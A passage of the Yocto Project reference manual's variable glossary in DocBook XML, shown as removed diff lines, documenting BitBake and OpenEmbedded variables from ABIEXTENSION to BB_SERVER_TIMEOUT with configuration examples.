- <link linkend='var-VOLATILE_LOG_DIR'>V</link>
- <link linkend='var-WARN_QA'>W</link>
- <link linkend='var-XSERVER'>X</link>
-<!-- <link linkend='var-glossary-y'>Y</link> -->
-<!-- <link linkend='var-glossary-z'>Z</link>-->
- </para>
-
- <glossdiv id='var-glossary-a'><title>A</title>
-
- <glossentry id='var-ABIEXTENSION'><glossterm>ABIEXTENSION</glossterm>
- <info>
- ABIEXTENSION[doc] = "Extension to the Application Binary Interface (ABI) field of the GNU canonical architecture name (e.g. "eabi")."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Extension to the Application Binary Interface (ABI)
- field of the GNU canonical architecture name
- (e.g. "eabi").
- </para>
-
- <para>
- ABI extensions are set in the machine include files.
- For example, the
- <filename>meta/conf/machine/include/arm/arch-arm.inc</filename>
- file sets the following extension:
- <literallayout class='monospaced'>
- ABIEXTENSION = "eabi"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ALLOW_EMPTY'><glossterm>ALLOW_EMPTY</glossterm>
- <info>
- ALLOW_EMPTY[doc] = "Specifies whether to produce an output package even if it is empty."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies whether to produce an output package even if it is
- empty.
- By default, BitBake does not produce empty packages.
- This default behavior can cause issues when there is an
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link> or
- some other hard runtime requirement on the existence of the package.
- </para>
-
- <para>
- Like all package-controlling variables, you must always use them in
- conjunction with a package name override, as in:
- <literallayout class='monospaced'>
- ALLOW_EMPTY_${PN} = "1"
- ALLOW_EMPTY_${PN}-dev = "1"
- ALLOW_EMPTY_${PN}-staticdev = "1"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ALTERNATIVE'><glossterm>ALTERNATIVE</glossterm>
- <info>
- ALTERNATIVE[doc] = "Lists commands in a package that need an alternative binary naming scheme."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Lists commands in a package that need an alternative
- binary naming scheme.
- Sometimes the same command is provided in multiple packages.
- When this occurs, the OpenEmbedded build system needs to
- use the alternatives system to create a different binary
- naming scheme so the commands can co-exist.
- </para>
-
- <para>
- To use the variable, list out the package's commands
- that also exist as part of another package.
- For example, if the <filename>busybox</filename> package
- has four commands that also exist as part of another
- package, you identify them as follows:
- <literallayout class='monospaced'>
- ALTERNATIVE_busybox = "sh sed test bracket"
- </literallayout>
- For more information on the alternatives system, see the
- "<link linkend='ref-classes-update-alternatives'><filename>update-alternatives.bbclass</filename></link>"
- section.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ALTERNATIVE_LINK_NAME'><glossterm>ALTERNATIVE_LINK_NAME</glossterm>
- <info>
- ALTERNATIVE_LINK_NAME[doc] = "Used by the alternatives system to map duplicated commands to actual locations."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Used by the alternatives system to map duplicated commands
- to actual locations.
- For example, if the <filename>bracket</filename> command
- provided by the <filename>busybox</filename> package is
- duplicated through another package, you must use the
- <filename>ALTERNATIVE_LINK_NAME</filename> variable to
- specify the actual location:
- <literallayout class='monospaced'>
- ALTERNATIVE_LINK_NAME[bracket] = "/usr/bin/["
- </literallayout>
- </para>
-
- <para>
- In this example, the binary for the
- <filename>bracket</filename> command (i.e.
- <filename>[</filename>) from the
- <filename>busybox</filename> package resides in
- <filename>/usr/bin/</filename>.
- <note>
- If <filename>ALTERNATIVE_LINK_NAME</filename> is not
- defined, it defaults to
- <filename>${bindir}/<replaceable>name</replaceable></filename>.
- </note>
- </para>
-
- <para>
- For more information on the alternatives system, see the
- "<link linkend='ref-classes-update-alternatives'><filename>update-alternatives.bbclass</filename></link>"
- section.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ALTERNATIVE_PRIORITY'><glossterm>ALTERNATIVE_PRIORITY</glossterm>
- <info>
- ALTERNATIVE_PRIORITY[doc] = "Used by the alternatives system to create default priorities for duplicated commands."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Used by the alternatives system to create default
- priorities for duplicated commands.
- You can use the variable to create a single default
- regardless of the command name or package, a default for
- specific duplicated commands regardless of the package, or
- a default for specific commands tied to particular packages.
- Here are the available syntax forms:
- <literallayout class='monospaced'>
- ALTERNATIVE_PRIORITY = "<replaceable>priority</replaceable>"
- ALTERNATIVE_PRIORITY[<replaceable>name</replaceable>] = "<replaceable>priority</replaceable>"
- ALTERNATIVE_PRIORITY_<replaceable>pkg</replaceable>[<replaceable>name</replaceable>] = "<replaceable>priority</replaceable>"
- </literallayout>
- </para>
-
- <para>
- For more information on the alternatives system, see the
- "<link linkend='ref-classes-update-alternatives'><filename>update-alternatives.bbclass</filename></link>"
- section.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ALTERNATIVE_TARGET'><glossterm>ALTERNATIVE_TARGET</glossterm>
- <info>
- ALTERNATIVE_TARGET[doc] = "Used by the alternatives system to create default link locations for duplicated commands."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Used by the alternatives system to create default link
- locations for duplicated commands.
- You can use the variable to create a single default
- location for all duplicated commands regardless of the
- command name or package, a default for
- specific duplicated commands regardless of the package, or
- a default for specific commands tied to particular packages.
- Here are the available syntax forms:
- <literallayout class='monospaced'>
- ALTERNATIVE_TARGET = "<replaceable>target</replaceable>"
- ALTERNATIVE_TARGET[<replaceable>name</replaceable>] = "<replaceable>target</replaceable>"
- ALTERNATIVE_TARGET_<replaceable>pkg</replaceable>[<replaceable>name</replaceable>] = "<replaceable>target</replaceable>"
- </literallayout>
- <note>
- <para>
- If <filename>ALTERNATIVE_TARGET</filename> is not
- defined, it inherits the value from the
- <link linkend='var-ALTERNATIVE_LINK_NAME'><filename>ALTERNATIVE_LINK_NAME</filename></link>
- variable.
- </para>
-
- <para>
- If <filename>ALTERNATIVE_LINK_NAME</filename> and
- <filename>ALTERNATIVE_TARGET</filename> are the
- same, the target for
- <filename>ALTERNATIVE_TARGET</filename>
- has "<filename>.{BPN}</filename>" appended to it.
- </para>
-
- <para>
- Finally, if the file referenced has not been
- renamed, the alternatives system will rename it to
- avoid the need to rename alternative files in the
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- task while
- retaining support for the command if necessary.
- </para>
- </note>
- </para>
-
- <para>
- For more information on the alternatives system, see the
- "<link linkend='ref-classes-update-alternatives'><filename>update-alternatives.bbclass</filename></link>"
- section.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-APPEND'><glossterm>APPEND</glossterm>
- <info>
- APPEND[doc] = "An override list of append strings for target specified using LABELS."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- An override list of append strings for each target
- specified with
- <link linkend='var-LABELS'><filename>LABELS</filename></link>.
- </para>
-
- <para>
- See the
- <link linkend='ref-classes-grub-efi'><filename>grub-efi</filename></link>
- class for more information on how this variable is used.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-AR'><glossterm>AR</glossterm>
- <info>
- AR[doc] = "Minimal command and arguments to run 'ar'."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The minimal command and arguments used to run
- <filename>ar</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ARCHIVER_MODE'><glossterm>ARCHIVER_MODE</glossterm>
- <info>
- ARCHIVER_MODE[doc] = "Controls archive creation used when releasing source files."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When used with the
- <link linkend='ref-classes-archiver'><filename>archiver</filename></link>
- class, determines the type of information used to create
- a released archive.
- You can use this variable to create archives of patched
- source, original source, configured source, and so forth
- by employing the following variable flags (varflags):
- <literallayout class='monospaced'>
- ARCHIVER_MODE[src] = "original" # Uses original (unpacked) source
- # files.
-
- ARCHIVER_MODE[src] = "patched" # Uses patched source files. This is
- # the default.
-
- ARCHIVER_MODE[src] = "configured" # Uses configured source files.
-
- ARCHIVER_MODE[diff] = "1" # Uses patches between do_unpack and
- # do_patch.
-
- ARCHIVER_MODE[diff-exclude] ?= "<replaceable>file</replaceable> <replaceable>file</replaceable> ..." # Lists files and directories to
- # exclude from diff.
-
- ARCHIVER_MODE[dumpdata] = "1" # Uses environment data.
-
- ARCHIVER_MODE[recipe] = "1" # Uses recipe and include files.
-
- ARCHIVER_MODE[srpm] = "1" # Uses RPM package files.
- </literallayout>
- For information on how the variable works, see the
- <filename>meta/classes/archiver.bbclass</filename> file
- in the
- <link linkend='source-directory'>Source Directory</link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-AS'><glossterm>AS</glossterm>
- <info>
- AS[doc] = "Minimal command and arguments to run the assembler."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Minimal command and arguments needed to run the
- assembler.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ASSUME_PROVIDED'><glossterm>ASSUME_PROVIDED</glossterm>
- <info>
- ASSUME_PROVIDED[doc] = "Lists recipe names (PN values) BitBake does not attempt to build."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Lists recipe names
- (<link linkend='var-PN'><filename>PN</filename></link>
- values) BitBake does not attempt to build.
- Instead, BitBake assumes these recipes have already been
- built.
- </para>
-
- <para>
- In OpenEmbedded-Core, <filename>ASSUME_PROVIDED</filename>
- mostly specifies native tools that should not be built.
- An example is <filename>git-native</filename>, which when
- specified, allows for the Git binary from the host to be
- used rather than building <filename>git-native</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ASSUME_SHLIBS'><glossterm>ASSUME_SHLIBS</glossterm>
- <info>
- ASSUME_SHLIBS[doc] = "Provides additional shlibs provider mapping information, which adds to or overwrites the information provided automatically by the system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Provides additional <filename>shlibs</filename> provider
- mapping information, which adds to or overwrites the
- information provided automatically by the system.
- Separate multiple entries using spaces.
- </para>
-
- <para>
- As an example, use the following form to add an
- <filename>shlib</filename> provider of
- <replaceable>shlibname</replaceable> in
- <replaceable>packagename</replaceable> with the optional
- <replaceable>version</replaceable>:
- <literallayout class='monospaced'>
- <replaceable>shlibname:packagename</replaceable>[_<replaceable>version</replaceable>]
- </literallayout>
- </para>
-
- <para>
- Here is an example that adds a shared library named
- <filename>libEGL.so.1</filename> as being provided by
- the <filename>libegl-implementation</filename> package:
- <literallayout class='monospaced'>
- ASSUME_SHLIBS = "libEGL.so.1:libegl-implementation"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-AUTHOR'><glossterm>AUTHOR</glossterm>
- <info>
- AUTHOR[doc] = "Email address used to contact the original author or authors in order to send patches and forward bugs."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The email address used to contact the original author
- or authors in order to send patches and forward bugs.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-AUTO_LIBNAME_PKGS'><glossterm>AUTO_LIBNAME_PKGS</glossterm>
- <info>
- AUTO_LIBNAME_PKGS[doc] = "Specifies which packages should be checked for libraries and renamed according to Debian library package naming."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When the
- <link linkend='ref-classes-debian'><filename>debian</filename></link>
- class is inherited, which is the default behavior,
- <filename>AUTO_LIBNAME_PKGS</filename> specifies which
- packages should be checked for libraries and renamed
- according to Debian library package naming.
- </para>
-
- <para>
- The default value is "${PACKAGES}", which causes the
- debian class to act on all packages that are
- explicitly generated by the recipe.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-AUTO_SYSLINUXMENU'><glossterm>AUTO_SYSLINUXMENU</glossterm>
- <info>
- AUTO_SYSLINUXMENU[doc] = "Enables creating an automatic menu for the syslinux bootloader."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Enables creating an automatic menu for the syslinux
- bootloader.
- You must set this variable in your recipe.
- The
- <link linkend='ref-classes-syslinux'><filename>syslinux</filename></link>
- class checks this variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-AUTOREV'><glossterm>AUTOREV</glossterm>
- <info>
- AUTOREV[doc] = "When SRCREV is set to the value of this variable, it specifies to use the latest source revision in the repository."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When
- <filename><link linkend='var-SRCREV'>SRCREV</link></filename>
- is set to the value of this variable, it specifies to use
- the latest source revision in the repository.
- Here is an example:
- <literallayout class='monospaced'>
- SRCREV = "${AUTOREV}"
- </literallayout>
- </para>
-
- <para>
- If you use the previous statement to retrieve the latest
- version of software, you need to be sure
- <link linkend='var-PV'><filename>PV</filename></link>
- contains
- <filename>${</filename><link linkend='var-SRCPV'><filename>SRCPV</filename></link><filename>}</filename>.
- For example, suppose you have a kernel recipe that
- inherits the
- <link linkend='ref-classes-kernel'>kernel</link> class
- and you use the previous statement.
- In this example, <filename>${SRCPV}</filename> does not
- automatically get into <filename>PV</filename>.
- Consequently, you need to change <filename>PV</filename>
- in your recipe so that it does contain
- <filename>${SRCPV}</filename>.
- </para>
-
- <para>
- For more information see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#automatically-incrementing-a-binary-package-revision-number'>Automatically Incrementing a Binary Package Revision Number</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-AVAILABLE_LICENSES'><glossterm>AVAILABLE_LICENSES</glossterm>
- <info>
- AVAILABLE_LICENSES[doc] = "List of licenses found in the directories specified by COMMON_LICENSE_DIR and LICENSE_PATH."
- </info>
- <glossdef>
- <para role="glossdeffirst">
-
- List of licenses found in the directories specified
- by <link linkend='var-COMMON_LICENSE_DIR'><filename>COMMON_LICENSE_DIR</filename></link>
- and <link linkend='var-LICENSE_PATH'><filename>LICENSE_PATH</filename></link>.
-
- <note>
- It is assumed that all changes
- to <filename>COMMON_LICENSE_DIR</filename>
- and <filename>LICENSE_PATH</filename> have been done
- before <filename>AVAILABLE_LICENSES</filename> is
- defined
- (in <link linkend='ref-classes-license'>license.bbclass</link>).
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-AVAILTUNES'><glossterm>AVAILTUNES</glossterm>
- <info>
- AVAILTUNES[doc] = "The list of defined CPU and Application Binary Interface (ABI) tunings (i.e. "tunes") available for use by the OpenEmbedded build system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The list of defined CPU and Application Binary Interface
- (ABI) tunings (i.e. "tunes") available for use by the
- OpenEmbedded build system.
- </para>
-
- <para>
- The list simply presents the tunes that are available.
- Not all tunes may be compatible with a particular
- machine configuration, or with each other in a
- <ulink url='&YOCTO_DOCS_DEV_URL;#combining-multiple-versions-library-files-into-one-image'>Multilib</ulink>
- configuration.
- </para>
-
- <para>
- To add a tune to the list, be sure to append it with
- spaces using the "+=" BitBake operator.
- Do not simply replace the list by using the "=" operator.
- See the
- "<ulink url='&YOCTO_DOCS_BB_URL;#basic-syntax'>Basic Syntax</ulink>"
- section in the BitBake User Manual for more information.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-glossary-b'><title>B</title>
-
- <glossentry id='var-B'><glossterm>B</glossterm>
- <info>
- B[doc] = "The Build Directory. The OpenEmbedded build system places generated objects into the Build Directory during a recipe's build process."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The directory within the
- <link linkend='build-directory'>Build Directory</link>
- in which the OpenEmbedded build system places generated
- objects during a recipe's build process.
- By default, this directory is the same as the <link linkend='var-S'><filename>S</filename></link>
- directory, which is defined as:
- <literallayout class='monospaced'>
- S = "${WORKDIR}/${BP}"
- </literallayout>
- </para>
-
- <para>
- You can separate the (<filename>S</filename>) directory
- and the directory pointed to by the <filename>B</filename>
- variable.
- Most Autotools-based recipes support separating these
- directories.
- The build system defaults to using separate directories for
- <filename>gcc</filename> and some kernel recipes.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BAD_RECOMMENDATIONS'><glossterm>BAD_RECOMMENDATIONS</glossterm>
- <info>
- BAD_RECOMMENDATIONS[doc] = "A list of packages not to install despite being recommended by a recipe. Support for this variable exists only when using the IPK packaging backend."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Lists "recommended-only" packages to not install.
- Recommended-only packages are packages installed only
- through the
- <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>
- variable.
- You can prevent any of these "recommended" packages from
- being installed by listing them with the
- <filename>BAD_RECOMMENDATIONS</filename> variable:
- <literallayout class='monospaced'>
- BAD_RECOMMENDATIONS = "<replaceable>package_name</replaceable> <replaceable>package_name</replaceable> <replaceable>package_name</replaceable> ..."
- </literallayout>
- </para>
-
- <para>
- You can set this variable globally in your
- <filename>local.conf</filename> file or you can attach it to
- a specific image recipe by using the recipe name override:
- <literallayout class='monospaced'>
- BAD_RECOMMENDATIONS_pn-<replaceable>target_image</replaceable> = "<replaceable>package_name</replaceable>"
- </literallayout>
- </para>
-
- <para>
- It is important to realize that if you choose to not install
- packages using this variable and some other packages are
- dependent on them (i.e. listed in a recipe's
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
- variable), the OpenEmbedded build system ignores your
- request and will install the packages to avoid dependency
- errors.
- </para>
-
- <para>
- Support for this variable exists only when using the
- IPK and RPM packaging backend.
- Support does not exist for DEB.
- </para>
-
- <para>
- See the
- <link linkend='var-NO_RECOMMENDATIONS'><filename>NO_RECOMMENDATIONS</filename></link>
- and the
- <link linkend='var-PACKAGE_EXCLUDE'><filename>PACKAGE_EXCLUDE</filename></link>
- variables for related information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BASE_LIB'><glossterm>BASE_LIB</glossterm>
- <info>
- BASE_LIB[doc] = "The library directory name for the CPU or Application Binary Interface (ABI) tune."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The library directory name for the CPU or Application
- Binary Interface (ABI) tune.
- The <filename>BASE_LIB</filename> applies only in the
- Multilib context.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#combining-multiple-versions-library-files-into-one-image'>Combining Multiple Versions of Library Files into One Image</ulink>"
- section in the Yocto Project Development Tasks Manual for
- information on Multilib.
- </para>
-
- <para>
- The <filename>BASE_LIB</filename> variable is defined in
- the machine include files in the
- <link linkend='source-directory'>Source Directory</link>.
- If Multilib is not being used, the value defaults to "lib".
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BASE_WORKDIR'><glossterm>BASE_WORKDIR</glossterm>
- <info>
- BASE_WORKDIR[doc] = "Points to the base of the work directory for all recipes."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to the base of the work directory for all recipes.
- The default value is "${TMPDIR}/work".
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BB_ALLOWED_NETWORKS'><glossterm>BB_ALLOWED_NETWORKS</glossterm>
- <info>
- BB_ALLOWED_NETWORKS[doc] = "A list of hosts that the fetcher is allowed to use to obtain the required source code."
- </info>
- <glossdef>
- <para>
- Specifies a space-delimited list of hosts that the fetcher
- is allowed to use to obtain the required source code.
- Following are considerations surrounding this variable:
- <itemizedlist>
- <listitem><para>
- This host list is only used if
- <filename>BB_NO_NETWORK</filename> is either not
- set or set to "0".
- </para></listitem>
- <listitem><para>
- Limited support for wildcard matching against the
- beginning of host names exists.
- For example, the following setting matches
- <filename>git.gnu.org</filename>,
- <filename>ftp.gnu.org</filename>, and
- <filename>foo.git.gnu.org</filename>.
- <literallayout class='monospaced'>
- BB_ALLOWED_NETWORKS = "*.gnu.org"
- </literallayout>
- <note><title>Important</title>
- <para>The use of the "<filename>*</filename>"
- character only works at the beginning of
- a host name and it must be isolated from
- the remainder of the host name.
- You cannot use the wildcard character in any
- other location of the name or combined with
- the front part of the name.</para>
-
- <para>For example,
- <filename>*.foo.bar</filename> is supported,
- while <filename>*aa.foo.bar</filename> is not.
- </para>
- </note>
- </para></listitem>
- <listitem><para>
- Mirrors not in the host list are skipped and
- logged in debug.
- </para></listitem>
- <listitem><para>
- Attempts to access networks not in the host list
- cause a failure.
- </para></listitem>
- </itemizedlist>
- Using <filename>BB_ALLOWED_NETWORKS</filename> in
- conjunction with
- <link linkend='var-PREMIRRORS'><filename>PREMIRRORS</filename></link>
- is very useful.
- Adding the host you want to use to
- <filename>PREMIRRORS</filename> results in the source code
- being fetched from an allowed location and avoids raising
- an error when a host that is not allowed is in a
- <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
- statement.
- This is because the fetcher does not attempt to use the
- host listed in <filename>SRC_URI</filename> after a
- successful fetch from the
- <filename>PREMIRRORS</filename> occurs.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BB_DANGLINGAPPENDS_WARNONLY'><glossterm>BB_DANGLINGAPPENDS_WARNONLY</glossterm>
- <info>
- BB_DANGLINGAPPENDS_WARNONLY[doc] = "Defines how BitBake handles situations where an append file (.bbappend) has no corresponding recipe file (.bb)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines how BitBake handles situations where an append
- file (<filename>.bbappend</filename>) has no
- corresponding recipe file (<filename>.bb</filename>).
- This condition often occurs when layers get out of sync
- (e.g. <filename>oe-core</filename> bumps a
- recipe version and the old recipe no longer exists and the
- other layer has not been updated to the new version
- of the recipe yet).
- </para>
-
- <para>
- The default fatal behavior is safest because it is
- the sane reaction given something is out of sync.
- It is important to realize when your changes are no longer
- being applied.
- </para>
-
- <para>
- You can change the default behavior by setting this
- variable to "1", "yes", or "true"
- in your <filename>local.conf</filename> file, which is
- located in the
- <link linkend='build-directory'>Build Directory</link>:
- Here is an example:
- <literallayout class='monospaced'>
- BB_DANGLINGAPPENDS_WARNONLY = "1"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BB_DISKMON_DIRS'><glossterm>BB_DISKMON_DIRS</glossterm>
- <info>
- BB_DISKMON_DIRS[doc] = "Monitors disk space and available inodes during the build and allows you to control the build based on these parameters."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Monitors disk space and available inodes during the build
- and allows you to control the build based on these
- parameters.
- </para>
-
- <para>
- Disk space monitoring is disabled by default.
- To enable monitoring, add the <filename>BB_DISKMON_DIRS</filename>
- variable to your <filename>conf/local.conf</filename> file found in the
- <link linkend='build-directory'>Build Directory</link>.
- Use the following form:
- <literallayout class='monospaced'>
- BB_DISKMON_DIRS = "<replaceable>action</replaceable>,<replaceable>dir</replaceable>,<replaceable>threshold</replaceable> [...]"
-
- where:
-
- <replaceable>action</replaceable> is:
- ABORT: Immediately abort the build when
- a threshold is broken.
- STOPTASKS: Stop the build after the currently
- executing tasks have finished when
- a threshold is broken.
- WARN: Issue a warning but continue the
- build when a threshold is broken.
- Subsequent warnings are issued as
- defined by the BB_DISKMON_WARNINTERVAL
- variable, which must be defined in
- the conf/local.conf file.
-
- <replaceable>dir</replaceable> is:
- Any directory you choose. You can specify one or
- more directories to monitor by separating the
- groupings with a space. If two directories are
- on the same device, only the first directory
- is monitored.
-
- <replaceable>threshold</replaceable> is:
- Either the minimum available disk space,
- the minimum number of free inodes, or
- both. You must specify at least one. To
- omit one or the other, simply omit the value.
- Specify the threshold using G, M, K for Gbytes,
- Mbytes, and Kbytes, respectively. If you do
- not specify G, M, or K, Kbytes is assumed by
- default. Do not use GB, MB, or KB.
- </literallayout>
- </para>
-
- <para>
- Here are some examples:
- <literallayout class='monospaced'>
- BB_DISKMON_DIRS = "ABORT,${TMPDIR},1G,100K WARN,${SSTATE_DIR},1G,100K"
- BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},1G"
- BB_DISKMON_DIRS = "ABORT,${TMPDIR},,100K"
- </literallayout>
- The first example works only if you also provide
- the <link linkend='var-BB_DISKMON_WARNINTERVAL'><filename>BB_DISKMON_WARNINTERVAL</filename></link> variable
- in the <filename>conf/local.conf</filename>.
- This example causes the build system to immediately
- abort when either the disk space in <filename>${TMPDIR}</filename> drops
- below 1 Gbyte or the available free inodes drops below
- 100 Kbytes.
- Because two directories are provided with the variable, the
- build system also issue a
- warning when the disk space in the
- <filename>${SSTATE_DIR}</filename> directory drops
- below 1 Gbyte or the number of free inodes drops
- below 100 Kbytes.
- Subsequent warnings are issued during intervals as
- defined by the <filename>BB_DISKMON_WARNINTERVAL</filename>
- variable.
- </para>
-
- <para>
- The second example stops the build after all currently
- executing tasks complete when the minimum disk space
- in the <filename>${<link linkend='var-TMPDIR'>TMPDIR</link>}</filename>
- directory drops below 1 Gbyte.
- No disk monitoring occurs for the free inodes in this case.
- </para>
-
- <para>
- The final example immediately aborts the build when the
- number of free inodes in the <filename>${TMPDIR}</filename> directory
- drops below 100 Kbytes.
- No disk space monitoring for the directory itself occurs
- in this case.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BB_DISKMON_WARNINTERVAL'><glossterm>BB_DISKMON_WARNINTERVAL</glossterm>
- <info>
- BB_DISKMON_WARNINTERVAL[doc] = "Defines the disk space and free inode warning intervals. To set these intervals, define the variable in the conf/local.conf file in the Build Directory."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines the disk space and free inode warning intervals.
- To set these intervals, define the variable in your
- <filename>conf/local.conf</filename> file in the
- <link linkend='build-directory'>Build Directory</link>.
- </para>
-
- <para>
- If you are going to use the
- <filename>BB_DISKMON_WARNINTERVAL</filename> variable, you must
- also use the
- <link linkend='var-BB_DISKMON_DIRS'><filename>BB_DISKMON_DIRS</filename></link> variable
- and define its action as "WARN".
- During the build, subsequent warnings are issued each time
- disk space or number of free inodes further reduces by
- the respective interval.
- </para>
-
- <para>
- If you do not provide a <filename>BB_DISKMON_WARNINTERVAL</filename>
- variable and you do use <filename>BB_DISKMON_DIRS</filename> with
- the "WARN" action, the disk monitoring interval defaults to
- the following:
- <literallayout class='monospaced'>
- BB_DISKMON_WARNINTERVAL = "50M,5K"
- </literallayout>
- </para>
-
- <para>
- When specifying the variable in your configuration file,
- use the following form:
- <literallayout class='monospaced'>
- BB_DISKMON_WARNINTERVAL = "<replaceable>disk_space_interval</replaceable>,<replaceable>disk_inode_interval</replaceable>"
-
- where:
-
- <replaceable>disk_space_interval</replaceable> is:
- An interval of memory expressed in either
- G, M, or K for Gbytes, Mbytes, or Kbytes,
- respectively. You cannot use GB, MB, or KB.
-
- <replaceable>disk_inode_interval</replaceable> is:
- An interval of free inodes expressed in either
- G, M, or K for Gbytes, Mbytes, or Kbytes,
- respectively. You cannot use GB, MB, or KB.
- </literallayout>
- </para>
-
- <para>
- Here is an example:
- <literallayout class='monospaced'>
- BB_DISKMON_DIRS = "WARN,${SSTATE_DIR},1G,100K"
- BB_DISKMON_WARNINTERVAL = "50M,5K"
- </literallayout>
- These variables cause the OpenEmbedded build system to
- issue subsequent warnings each time the available
- disk space further reduces by 50 Mbytes or the number
- of free inodes further reduces by 5 Kbytes in the
- <filename>${SSTATE_DIR}</filename> directory.
- Subsequent warnings based on the interval occur each time
- a respective interval is reached beyond the initial warning
- (i.e. 1 Gbytes and 100 Kbytes).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BB_GENERATE_MIRROR_TARBALLS'><glossterm>BB_GENERATE_MIRROR_TARBALLS</glossterm>
- <info>
- BB_GENERATE_MIRROR_TARBALLS[doc] = "Causes tarballs of the source control repositories to be placed in the DL_DIR directory."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Causes tarballs of the source control repositories
- (e.g. Git repositories), including metadata, to be placed
- in the
- <link linkend='var-DL_DIR'><filename>DL_DIR</filename></link>
- directory.
- </para>
-
- <para>
- For performance reasons, creating and placing tarballs of
- these repositories is not the default action by the
- OpenEmbedded build system.
- <literallayout class='monospaced'>
- BB_GENERATE_MIRROR_TARBALLS = "1"
- </literallayout>
- Set this variable in your <filename>local.conf</filename>
- file in the
- <link linkend='build-directory'>Build Directory</link>.
- </para>
-
- <para>
- Once you have the tarballs containing your source files,
- you can clean up your <filename>DL_DIR</filename>
- directory by deleting any Git or other source control
- work directories.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BB_NUMBER_THREADS'><glossterm>BB_NUMBER_THREADS</glossterm>
- <info>
- BB_NUMBER_THREADS[doc] = "The maximum number of tasks BitBake should run in parallel at any one time. This variable is automatically configured to be equal to the number of build system cores."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The maximum number of tasks BitBake should run in parallel
- at any one time.
- The OpenEmbedded build system automatically configures
- this variable to be equal to the number of cores on the
- build system.
- For example, a system with a dual core processor that
- also uses hyper-threading causes the
- <filename>BB_NUMBER_THREADS</filename> variable to default
- to "4".
- </para>
-
- <para>
- For single socket systems (i.e. one CPU), you should not
- have to override this variable to gain optimal parallelism
- during builds.
- However, if you have very large systems that employ
- multiple physical CPUs, you might want to make sure the
- <filename>BB_NUMBER_THREADS</filename> variable is not
- set higher than "20".
- </para>
-
- <para>
- For more information on speeding up builds, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#speeding-up-a-build'>Speeding Up a Build</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BB_SERVER_TIMEOUT'><glossterm>BB_SERVER_TIMEOUT</glossterm>
- <info>
- BB_SERVER_TIMEOUT [doc] = "Specifies the time (in seconds) after which to unload the BitBake server due to inactivity."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the time (in seconds) after which to unload the
- BitBake server due to inactivity.
- Set <filename>BB_SERVER_TIMEOUT</filename> to determine how
- long the BitBake server stays resident between invocations.
- </para>
-
- <para>
- For example, the following statement in your
- <filename>local.conf</filename> file instructs the server
- to be unloaded after 20 seconds of inactivity:
- <literallayout class='monospaced'>
- BB_SERVER_TIMEOUT = "20"
- </literallayout>
- If you want the server to never be unloaded, set
- <filename>BB_SERVER_TIMEOUT</filename> to "-1".
- </para>
- </glossdef>
- </glossentry>
-
